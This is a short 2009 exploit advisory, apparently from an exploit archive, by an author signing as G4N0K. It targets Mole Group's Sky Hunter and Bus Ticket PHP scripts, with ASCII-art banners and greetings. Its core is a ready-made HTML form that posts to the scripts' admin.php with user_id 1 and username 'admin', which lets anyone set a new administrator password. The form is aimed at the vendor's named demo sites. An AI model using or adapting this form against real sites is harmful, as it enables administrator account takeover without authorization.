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Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit
来源:mail[.]ganok[sh!t]gmail.com 作者:G4N0K 发布时间:2009-05-25  

                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' /
                    | |_| | |__   _| | |\  | | |_| | | . \
                     \____|    |_|   |_| \_|  \___/  |_|\_\...FROM IRAN

 Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit

 [»] Script:.............[ Mole Group Sky Hunter/Bus Ticket Scripts ]..
 [»] Website:............[ http://www.mole-group.com ].................
 [»] Today:..............[ 2205009 ]...................................
 [»] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......

  [+] Vulnerable Scripts
       [0] Sky Hunter Script (demo: http://sky.mole-group.com/admin/admin.php)
       [1] Bus Ticket Script (demo: http://bus.mole-group.com/admin/admin.php)


  [+] Greetz
       [»] ALLAH
       [»] MSD, AMD, AFN, SMN, Str0ke...
       [»] Hussain-X, JiKo, Sakab(!)...

<title>Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit | G4N0K</title>


 <h3>::Change Password</h3>

   <form method="post" action="http://sky.mole-group.com/admin/admin.php">
   <input type="hidden" name="user_id" value="1">
   <td align=right>Username:</td>
   <td align=left><input name="user_name" size="40" maxlength="40" value="admin"><td>
   <td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
   <td></td><td><input type="submit" name="submit" value="Change Password"></td>

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